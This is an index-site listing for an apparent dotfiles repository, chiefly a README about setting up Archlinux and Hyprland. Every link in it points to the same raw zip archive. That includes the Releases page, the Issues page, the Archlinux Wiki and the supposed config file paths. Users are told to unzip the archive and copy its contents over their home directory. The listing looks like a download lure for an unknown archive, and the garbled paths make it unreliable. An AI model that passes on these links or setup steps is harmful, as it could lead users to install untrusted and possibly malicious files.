An open API service indexing awesome lists of open source software.

https://github.com/selen525/dotfiles

πŸŽ›οΈ Craft your ideal Linux desktop experience with these organized and customized configuration files for seamless setup and optimal performance.
https://github.com/selen525/dotfiles

awesome containers docker dotfile dotfile-management dotfiles dotfiles-linux dotfiles-resources encryption fish gpg list makefile multiple-machines oh-my-zsh shell template yadm

Last synced: 19 days ago
JSON representation

πŸŽ›οΈ Craft your ideal Linux desktop experience with these organized and customized configuration files for seamless setup and optimal performance.

Awesome Lists containing this project

README

          

# πŸ–₯️ dotfiles - Simple Setup for Archlinux & Hyprland

[![Download Latest Release](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip%20Latest%https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip)](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip)

## πŸš€ Getting Started

Welcome! This guide will help you easily download and run the dotfiles application for Archlinux and Hyprland. Follow the steps below to get started.

## πŸ“¦ System Requirements

Before you download, ensure your system meets these requirements:

- Operating System: Archlinux
- A terminal emulator (e.g., Konsole, Terminal)
- Basic knowledge of the terminal for installation

## πŸ“₯ Download & Install

To get the latest version, visit this page to download: [Releases Page](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip).

1. Click the link above to access the Releases page.
2. Look for the latest version. It will have the highest version number.
3. Download the `https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip` or another available archive file.
4. Once the download completes, unzip the file to a location of your choice.

## βš™οΈ Configuration

To set up your dotfiles, follow these steps:

1. Open your terminal.
2. Navigate to the folder where you unzipped the dotfiles:
```bash
cd path/to/unzipped/folder
```
3. Copy the dotfiles to your home directory:
```bash
cp -R ./* ~/
```

This step will overwrite any existing dotfiles in your home directory. Backup your current dotfiles if needed.

## πŸ› οΈ Features

This dotfiles repository includes configurations for:

- **Hyprland:** A modern and customizable window manager.
- **Neovim:** An enhanced version of Vim for text editing.
- **Tmux:** A terminal multiplexer that allows multiple terminal sessions.

Each application has its own configuration files that you can customize further as per your needs.

## πŸ” Customization

After you copy the dotfiles, you might want to customize them:

- **Neovim Configuration:** Located in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Edit this file to change editor settings.
- **Tmux Configuration:** Found in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Adjust this file to set your preferred terminal parameters.
- **Hyprland Settings:** Located in `~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip`. Modify this according to your workflow.

## πŸ’‘ Troubleshooting

If you encounter issues during installation, consider the following tips:

- Ensure you have installed required applications on your system.
- Check file permissions. Ensure the copied files are accessible.
- View the terminal output for any error messages. These can guide you to the specific problem.

## 🌐 Community & Support

For assistance and community support, you can:

- Visit the [GitHub Issues Page](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip) for any questions or to report bugs.
- Look for discussions related to Archlinux and Hyprland in forums or chat groups for user-contributed tips.

## πŸ”— Additional Resources

- **Archlinux Wiki:** [Archlinux Documentation](https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip)
- **Hyprland Guide:** Check Hyprland’s official documentation for advanced setups.
- **Neovim Tutorials:** Numerous online resources are available to learn about Neovim's features and usage.

## πŸ“ž Contact

For direct questions regarding this repository, feel free to create an issue on the repository page. Your feedback is important, and we appreciate your contribution to the community.

## ⚠️ License

This project is licensed under the MIT License. This means you can modify and distribute it as you like, provided that you include a copy of the original license.